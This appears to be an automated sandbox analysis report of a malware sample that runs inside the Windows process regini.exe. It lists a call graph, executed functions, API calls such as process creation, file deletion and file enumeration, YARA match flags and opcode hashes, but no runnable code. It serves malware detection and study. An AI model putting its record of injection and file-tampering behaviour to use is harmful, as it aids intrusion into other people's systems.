96947->96969 96948 2e1b6da 96951 2e18420 LdrInitializeThunk 96948->96951 96949->96938 96949->96948 96950 2e1b6b8 96949->96950 96966 2e15e60 96949->96966 96984 2e249b0 LdrInitializeThunk 96950->96984 96956 2e1b6e8 96951->96956 96952 2e18420 LdrInitializeThunk 96957 2e1b7af 96952->96957 96956->96933 96957->96933 96958 2e1b778 96974 2e28950 96958->96974 96960 2e1b792 96979 2e28ab0 96960->96979 96962->96952 96964 2e29afa 96963->96964 96965 2e29b0b CreateProcessInternalW 96964->96965 96965->96940 96967 2e28f00 LdrInitializeThunk 96966->96967 96968 2e15e9e 96967->96968 96968->96950 96970 2e28917 96969->96970 96971 2e288c8 96969->96971 96985 36739b0 LdrInitializeThunk 96970->96985 96971->96958 96972 2e2893c 96972->96958 96975 2e289c7 96974->96975 96977 2e28978 96974->96977 96986 3674340 LdrInitializeThunk 96975->96986 96976 2e289ec 96976->96960 96977->96960 96980 2e28b27 96979->96980 96982 2e28ad8 96979->96982 96987 3672fb0 LdrInitializeThunk 96980->96987 96981 2e28b4c 96981->96962 96982->96962 96984->96948 96985->96972 96986->96976 96987->96981 96988 2e29640 96989 2e296b1 96988->96989 96991 2e29668 96988->96991 96990 2e296c7 NtDeleteFile 96989->96990 97205 2e2c880 97206 2e2b780 RtlFreeHeap 97205->97206 97207 2e2c895 97206->97207 96992 2e19f45 96993 2e19f50 96992->96993 96994 2e19f79 96993->96994 96995 2e2b780 RtlFreeHeap 96993->96995 96995->96994 96996 2e18b47 96997 2e18b4a 96996->96997 96998 2e18b01 96997->96998 97000 2e173e0 96997->97000 97001 2e173f6 97000->97001 97003 2e1742f 97000->97003 97001->97003 97004 2e17250 LdrLoadDll LdrLoadDll 97001->97004 97003->96998 97004->97003 97005 2e1fad0 97006 2e1fb34 97005->97006 97034 2e165f0 97006->97034 97008 2e1fc6e 97009 2e1fc67 97009->97008 97041 2e16700 97009->97041 97011 2e1fcea 97012 2e1fe22 97011->97012 97031 2e1fe13 97011->97031 97045 2e1f8b0 97011->97045 97013 2e296e0 NtClose 97012->97013 97015 2e1fe2c 97013->97015 97016 2e1fd26 97016->97012 97017 2e1fd31 97016->97017 97018 2e2b860 RtlAllocateHeap 97017->97018 97019 2e1fd5a 97018->97019 97020 2e1fd63 97019->97020 97021 2e1fd79 97019->97021 97022 2e296e0 NtClose 97020->97022 97054 2e1f7a0 CoInitialize 97021->97054 97024 2e1fd6d 97022->97024 97025 2e1fd87 97057 2e291b0 97025->97057 97027 2e1fe02 97028 2e296e0 NtClose 97027->97028 97029 2e1fe0c 97028->97029 97030 2e2b780 RtlFreeHeap 97029->97030 97030->97031 97032 2e1fda5 97032->97027 97033 2e291b0 LdrInitializeThunk 97032->97033 97033->97032 97035 2e16623 97034->97035 97036 2e16647 97035->97036 97061 2e29250 97035->97061 97036->97009 97038 2e1666a 97038->97036 97039 2e296e0 NtClose 97038->97039 97040 2e166ec 97039->97040 97040->97009 97042 2e16725 97041->97042 97066 2e29040 97042->97066 97046 2e1f8cc 97045->97046 97047 2e14880 2 API calls 97046->97047 97049 2e1f8ea 97047->97049 97048 2e1f8f3 97048->97016 97049->97048 97050 2e14880 2 API calls 97049->97050 97051 2e1f9be 97050->97051 97052 2e14880 2 API calls 97051->97052 97053 2e1fa18 97051->97053 97052->97053 97053->97016 97056 2e1f805 97054->97056 97055 2e1f89b CoUninitialize 97055->97025 97056->97055 97058 2e291ca 97057->97058 97071 3672ba0 LdrInitializeThunk 97058->97071 97059 2e291fa 97059->97032 97062 2e2926d 97061->97062 97065 3672ca0 LdrInitializeThunk 97062->97065 97063 2e29299 97063->97038 97065->97063 97067 2e2905d 97066->97067 97070 3672c60 LdrInitializeThunk 97067->97070 97068 2e16799 97068->97011 97070->97068 97071->97059 97072 2e1c8d0 97074 2e1c8f9 97072->97074 97073 2e1c9fd 97074->97073 97075 2e1c9a3 FindFirstFileW 97074->97075 97075->97073 97077 2e1c9be 97075->97077 97076 2e1c9e4 FindNextFileW 97076->97077 97078 2e1c9f6 FindClose 97076->97078 97077->97076 97078->97073 97079 2e1b050 97084 2e1ad60 97079->97084 97081 2e1b05d 97098 2e1a9e0 97081->97098 97083 2e1b073 97085 2e1ad85 97084->97085 97109 2e18690 97085->97109 97088 2e1aed0 97088->97081 97090 2e1aee7 97090->97081 97091 2e1aede 97091->97090 97093 2e1afd5 97091->97093 97128 2e1a430 97091->97128 97095 2e1b03a 97093->97095 97137 2e1a7a0 97093->97137 97096 2e2b780 RtlFreeHeap 97095->97096 97097 2e1b041 97096->97097 97097->97081 97099 2e1a9f3 97098->97099 97106 2e1a9fe 97098->97106 97100 2e2b860 RtlAllocateHeap 97099->97100 97100->97106 97101 2e1aa1f 97101->97083 97102 2e18690 GetFileAttributesW 97102->97106 97103 2e1ad32 97104 2e1ad48 97103->97104 97105 2e2b780 RtlFreeHeap 97103->97105 97104->97083 97105->97104 97106->97101 97106->97102 97106->97103 97107 2e1a430 RtlFreeHeap 97106->97107 97108 2e1a7a0 RtlFreeHeap 97106->97108 97107->97106 97108->97106 97110 2e186b1 97109->97110 97111 2e186b8 GetFileAttributesW 97110->97111 97112 2e186c3 97110->97112 97111->97112 97112->97088 97113 2e235a0 97112->97113 97114 2e235ae 97113->97114 97115 2e235b5 97113->97115 97114->97091 97116 2e14880 2 API calls 97115->97116 97117 2e235ea 97116->97117 97118 2e235f9 97117->97118 97141 2e23060 LdrLoadDll LdrLoadDll 97117->97141 97120 2e2b860 RtlAllocateHeap 97118->97120 97124 2e237a4 97118->97124 97121 2e23612 97120->97121 97122 2e2379a 97121->97122 97121->97124 97125 2e2362e 97121->97125 97123 2e2b780 RtlFreeHeap 97122->97123 97122->97124 97123->97124 97124->97091 97125->97124 97126 2e2b780 RtlFreeHeap 97125->97126 97127 2e2378e 97126->97127 97127->97091 97129 2e1a456 97128->97129 97142 2e1de30 97129->97142 97131 2e1a4c8 97133 2e1a4e6 97131->97133 97134 2e1a650 97131->97134 97132 2e1a635 97132->97091 97133->97132 97147 2e1a2f0 97133->97147 97134->97132 97135 2e1a2f0 RtlFreeHeap 97134->97135 97135->97134 97138 2e1a7c6 97137->97138 97139 2e1de30 RtlFreeHeap 97138->97139 97140 2e1a84d 97139->97140 97140->97093 97141->97118 97144 2e1de54 97142->97144 97143 2e1de61 97143->97131 97144->97143 97145 2e2b780 RtlFreeHeap 97144->97145 97146 2e1dea4 97145->97146 97146->97131 97148 2e1a30d 97147->97148 97151 2e1dec0 97148->97151 97150 2e1a413 97150->97133 97152 2e1dee4 97151->97152 97153 2e1df8e 97152->97153 97154 2e2b780 RtlFreeHeap 97152->97154 97153->97150 97154->97153 97155 2e125d0 97156 2e28d30 LdrInitializeThunk 97155->97156 97157 2e12606 97156->97157 97160 2e29780 97157->97160 97159 2e1261b 97161 2e2980c 97160->97161 97163 2e297ab 97160->97163 97165 3672e80 LdrInitializeThunk 97161->97165 97162 2e2983d 97162->97159 97163->97159 97165->97162 97166 2e219d0 97167 2e219ec 97166->97167 97168 2e21a14 97167->97168 97169 2e21a28 97167->97169 97170 2e296e0 NtClose 97168->97170 97171 2e296e0 NtClose 97169->97171 97172 2e21a1d 97170->97172 97173 2e21a31 97171->97173 97176 2e2b8a0 RtlAllocateHeap 97173->97176 97175 2e21a3c 97176->97175 97177 2e29550 97178 2e295f4 97177->97178 97180 2e2957b 97177->97180 97179 2e2960a NtReadFile 97178->97179 97213 2e20390 97214 2e203ad 97213->97214 97215 2e14880 2 API calls 97214->97215 97216 2e203cb 97215->97216 97181 3672ad0 LdrInitializeThunk

                                                                    Executed Functions

                                                                    Function 02E09E40 Relevance: 29.1, Strings: 23, Instructions: 386COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 27 2e09e40-2e0a1a5 28 2e0a1ac-2e0a1b3 27->28 29 2e0a1e5 28->29 30 2e0a1b5-2e0a1e3 28->30 31 2e0a1ec-2e0a1f8 29->31 30->28 32 2e0a217-2e0a221 31->32 33 2e0a1fa-2e0a215 31->33 34 2e0a232-2e0a23e 32->34 33->31 35 2e0a240-2e0a252 34->35 36 2e0a254-2e0a265 34->36 35->34 38 2e0a276-2e0a280 36->38 39 2e0a282-2e0a2d2 38->39 40 2e0a2d4-2e0a2e5 38->40 39->38 42 2e0a2f6-2e0a302 40->42 43 2e0a304-2e0a316 42->43 44 2e0a318-2e0a321 42->44 43->42 46 2e0a323-2e0a344 44->46 47 2e0a346-2e0a34f 44->47 46->44 48 2e0a355-2e0a370 47->48 49 2e0a57a-2e0a581 47->49 48->48 52 2e0a372-2e0a37c 48->52 50 2e0a5b3-2e0a5bd 49->50 51 2e0a583-2e0a5b1 49->51 53 2e0a5ce-2e0a5d5 50->53 51->49 54 2e0a38d-2e0a396 52->54 57 2e0a5e5-2e0a5ec 53->57 58 2e0a5d7-2e0a5e3 53->58 55 2e0a3a6-2e0a3b9 54->55 56 2e0a398-2e0a3a4 54->56 60 2e0a3ca-2e0a3d6 55->60 56->54 62 2e0a618-2e0a61f 57->62 63 2e0a5ee-2e0a616 57->63 58->53 64 2e0a3d8-2e0a3ea 60->64 65 2e0a3ec-2e0a3fb 60->65 66 2e0a621-2e0a631 62->66 67 2e0a686-2e0a68f 62->67 63->57 64->60 69 2e0a41d-2e0a427 65->69 70 2e0a3fd-2e0a416 65->70 66->66 71 2e0a633-2e0a63d 66->71 73 2e0a460-2e0a474 69->73 74 2e0a429-2e0a444 69->74 70->70 72 2e0a418 70->72 75 2e0a64e-2e0a657 71->75 72->49 78 2e0a485-2e0a48e 73->78 76 2e0a446-2e0a44a 74->76 77 2e0a44b-2e0a44d 74->77 79 2e0a659-2e0a662 75->79 80 2e0a66f call 2e2b3e0 75->80 76->77 84 2e0a45e 77->84 85 2e0a44f-2e0a458 77->85 81 2e0a490-2e0a4a0 78->81 82 2e0a4a2-2e0a4ae 78->82 86 2e0a664-2e0a66a 79->86 87 2e0a66d 79->87 91 2e0a674-2e0a684 80->91 81->78 89 2e0a4b0-2e0a4cb 82->89 90 2e0a4cd-2e0a4d7 82->90 84->69 85->84 86->87 88 2e0a63f-2e0a648 87->88 88->75 89->82 93 2e0a4e8-2e0a4f4 90->93 91->67 91->91 94 2e0a4f6-2e0a508 93->94 95 2e0a50a-2e0a514 93->95 94->93 96 2e0a525-2e0a52e 95->96 98 2e0a530-2e0a53f 96->98 99 2e0a541-2e0a54b 96->99 98->96 100 2e0a55c-2e0a568 99->100 102 2e0a575 100->102 103 2e0a56a-2e0a573 100->103 102->47 103->100
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "$%$&f$.@$<|$?:$F$I>$V.$W$X}$bG$dg$e%V.$hr$jO$p4$v${${P${]$~$h
                                                                    • API String ID: 0-844827240
                                                                    • Opcode ID: d56941347c9e308f37162984917cb5c97560ca15faac07f2d2fbf9c2cc7d79be
                                                                    • Instruction ID: 9f192189f822cb48300cdfee86f77f9b80560073b93fdee5266ad9812f6e1e08
                                                                    • Opcode Fuzzy Hash: d56941347c9e308f37162984917cb5c97560ca15faac07f2d2fbf9c2cc7d79be
                                                                    • Instruction Fuzzy Hash: EB2278B0D45229CBEB24CF45C998BDDBBB2BB44308F1092E9D1496B380D7B95AC9CF54
                                                                    Function 02E1C8D0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 02E1C9B4
                                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 02E1C9EF
                                                                    • FindClose.KERNELBASE(?), ref: 02E1C9FA
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstNext
                                                                    • String ID:
                                                                    • API String ID: 3541575487-0
                                                                    • Opcode ID: 3e55da1cfd8cad6bbb757cd532cfe8eb3c10e6acfd91596a3322c7845f83d105
                                                                    • Instruction ID: 3851ee82c587ee49cd985875b7d32346bc706a3abb565f7b7b5400c0ebfc916b
                                                                    • Opcode Fuzzy Hash: 3e55da1cfd8cad6bbb757cd532cfe8eb3c10e6acfd91596a3322c7845f83d105
                                                                    • Instruction Fuzzy Hash: 0F3192729803087BDB20DFA0CC85FEF777D9F48748F109559B509AA180D7B4AA85CBA1
                                                                    Function 02E293F0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtCreateFile.NTDLL(?,24064BBE,?,?,?,?,?,?,?,?,?), ref: 02E294E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 89953b318f57b8eeb3b94e37ccb434cef16c25349bd0a665c16f5a89a13f60d4
                                                                    • Instruction ID: fb20311258fcc0b913ad7f946aa24f2ce63bab3d1aaae917f8c5a8162a85116e
                                                                    • Opcode Fuzzy Hash: 89953b318f57b8eeb3b94e37ccb434cef16c25349bd0a665c16f5a89a13f60d4
                                                                    • Instruction Fuzzy Hash: CB31D4B5A41258AFCB14DF98D880EEEB7B9EF8C300F108219F919A7344D730A955CFA4
                                                                    Function 02E29550 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtReadFile.NTDLL(?,24064BBE,?,?,?,?,?,?,?), ref: 02E29633
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: d010eacb628a258346aa53aefa1bed7b249c9d68a6701697dc2ea1d6fb028099
                                                                    • Instruction ID: 51e2fe237a9c85c8f920119e124cb68fd18db3bc08c9726e4b5b4ef50b578c4a
                                                                    • Opcode Fuzzy Hash: d010eacb628a258346aa53aefa1bed7b249c9d68a6701697dc2ea1d6fb028099
                                                                    • Instruction Fuzzy Hash: 7631F5B5A40258AFCB14DF98D880EEFB7B9EF88310F108219F919A7344D730A951CFA5
                                                                    Function 02E29850 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(02E120BB,24064BBE,02E281DF,00000000,00000004,00003000,?,?,?,?,?,02E281DF,02E120BB), ref: 02E29912
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: cedafb1025b038325b921a273ed17e15dc8af73268ddac6631b876435128dcc7
                                                                    • Instruction ID: 049e87d77f522267e1ca69cbc98750af36853844172cc4b0429e117ea32d4664
                                                                    • Opcode Fuzzy Hash: cedafb1025b038325b921a273ed17e15dc8af73268ddac6631b876435128dcc7
                                                                    • Instruction Fuzzy Hash: 88212BB5A40258ABDB14DF98DC41FEF77BAEF88300F108519F919AB344D770A9118BA5
                                                                    Function 02E29640 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteFile
                                                                    • String ID:
                                                                    • API String ID: 4033686569-0
                                                                    • Opcode ID: e2871cfb3dc0ff402a426fcbebe61238aa19fe36c2eaceb1abd14c6b07a2ed57
                                                                    • Instruction ID: ebbaf581d5cd0aa0035d9d7734c21e9b4941a18af41aa83bd2ebaa2f89d260dd
                                                                    • Opcode Fuzzy Hash: e2871cfb3dc0ff402a426fcbebe61238aa19fe36c2eaceb1abd14c6b07a2ed57
                                                                    • Instruction Fuzzy Hash: 5211CE71A402187FD620EBA4CC41FAF73ADEF85304F008149FA1D6B280E775B9158BE5
                                                                    Function 02E296E0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02E29717
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_2e00000_regini.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                    • Instruction ID: 5831853b8112fb587abcd148efc190a50761f8101583b170a31d1f924c822ab9
                                                                    • Opcode Fuzzy Hash: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                    • Instruction Fuzzy Hash: 38E04636240214BBC220AA6ADC40FAB776DDFC6710F108819FA49BB280C671BA118BF0
                                                                    Function 03674340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 220226324abee41323fabff9899d2359fe1387d4f3b373e1cee263fcacd492e0
                                                                    • Instruction ID: 809977f9366c9fbda9797c0c7b21ec1f7a491882b24f294b8462c3611699f634
                                                                    • Opcode Fuzzy Hash: 220226324abee41323fabff9899d2359fe1387d4f3b373e1cee263fcacd492e0
                                                                    • Instruction Fuzzy Hash: 15900231605804129140B65848C4586400697E4301B95C111E0424658D8B548A565361
                                                                    Function 03674650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 847cbb0c131c6079d94eee7b445a3d08d2fc4e92f06adea91e87819f2162aca8
                                                                    • Instruction ID: 2adb74a592e17b02683643e347870d444cf33e8ca16646f475d114a35ec6c132
                                                                    • Opcode Fuzzy Hash: 847cbb0c131c6079d94eee7b445a3d08d2fc4e92f06adea91e87819f2162aca8
                                                                    • Instruction Fuzzy Hash: CD900261601504424140B6584844446600697E53013D5C215A0554664D875889559269
                                                                    Function 03672B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b47d092546cf0f668c24698b700959e6e4ba002d712871d4bc7a91d939c14bae
                                                                    • Instruction ID: 477d092c06117334780cd49e62da7514cc2248fe399308c3f7817f4bebfa49c6
                                                                    • Opcode Fuzzy Hash: b47d092546cf0f668c24698b700959e6e4ba002d712871d4bc7a91d939c14bae
                                                                    • Instruction Fuzzy Hash: 87900261202404034105B6584454656400B87E4301B95C121E1014694EC66589916125
                                                                    Function 03672BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0d626bd91d65d7d372195edb5faf2278834fd64f8a997008c243e8304fa74afa
                                                                    • Instruction ID: 45fe79f86ada4a08304903ed8f6a16fdb893b5eff3353011f0b806c660d03e00
                                                                    • Opcode Fuzzy Hash: 0d626bd91d65d7d372195edb5faf2278834fd64f8a997008c243e8304fa74afa
                                                                    • Instruction Fuzzy Hash: 5190023120544C42D140B6584444A86001687D4305F95C111A0064798E97658E55B661
                                                                    Function 03672BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: c4ddd402f7adcbc87f20f0d8804259ccab9924af19a446120d43bc84c95672c4
                                                                    • Instruction ID: 9b1f26a2aaeee0eb726926c5200498220773c51982f232afdb7d29ea440c4cce
                                                                    • Opcode Fuzzy Hash: c4ddd402f7adcbc87f20f0d8804259ccab9924af19a446120d43bc84c95672c4
                                                                    • Instruction Fuzzy Hash: D890023120140C02D180B658444468A000687D5301FD5C115A0025758ECB558B5977A1
                                                                    Function 03672BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ba51f4069295b75a70f253e196f475a8fe8e23e9bd12d9cd149cb58aef0ef2c4
                                                                    • Instruction ID: e255ac6017c0f8023d8087a68b876ccfe483b10b3dd1a74a8bc27fc882ffe6f0
                                                                    • Opcode Fuzzy Hash: ba51f4069295b75a70f253e196f475a8fe8e23e9bd12d9cd149cb58aef0ef2c4
                                                                    • Instruction Fuzzy Hash: 3E90023160540C02D150B6584454786000687D4301F95C111A0024758E87958B5576A1
                                                                    Function 03672AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 9865da355708da3dee31bec0f9514a92978feab2fe243d9eb4a2459ada50ae9d
                                                                    • Instruction ID: 1876c73531c03fd5f33fb72b88d5b2296e29a5202e95ac72e0d702bfd56775b3
                                                                    • Opcode Fuzzy Hash: 9865da355708da3dee31bec0f9514a92978feab2fe243d9eb4a2459ada50ae9d
                                                                    • Instruction Fuzzy Hash: 87900225221404020145FA58064454B044697DA3513D5C115F1416694DC76189655321
                                                                    Function 03672AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000379E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_3600000_regini.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 2cadfc41327b4bb12c4be7e172952bb3ff4bd0c15ff566897a5d3e929471c4f4
                                                                    • Instruction ID: 5c99afa0f746733a33a2d0d181c16d202c37b6c620a31395c28dca174068b168
                                                                    • Opcode Fuzzy Hash: 2cadfc41327b4bb12c4be7e172952bb3ff4bd0c15ff566897a5d3e929471c4f4
                                                                    • Instruction Fuzzy Hash: FA900435311404030105FF5C07445470047C7DD3513D5C131F1015754DD771CD715131
                                                                    Function 03672F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3936291550.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                                    • Associated: 00000007.00000002.3936291550.0000000003729000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3936291550.000000000372D000.00000040.00001000.00020000.00000000.sdmpDownload File
